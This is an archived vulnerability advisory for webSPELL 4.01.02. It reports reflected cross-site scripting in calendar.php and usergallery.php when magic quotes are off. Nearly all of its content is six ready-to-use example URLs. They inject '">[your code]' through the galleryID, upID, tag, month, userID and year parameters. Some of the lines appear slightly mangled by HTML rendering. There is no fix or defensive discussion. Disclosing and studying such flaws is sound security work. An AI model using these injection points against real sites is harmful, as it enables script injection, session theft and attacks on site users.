TUCoPS :: HP Unsorted W :: bx1001.htm

webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability


###################
Autor: Brainhead
Type: XSS
Version:  4.01.02
Files: usergallery.php, calendar.php
Magic Quotes :off
###################
Examples:

[your">http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code]
[your">http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[your code]
[your">http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
[your">http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[your code]
[your">http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">[your code]
[your">http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[your code]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH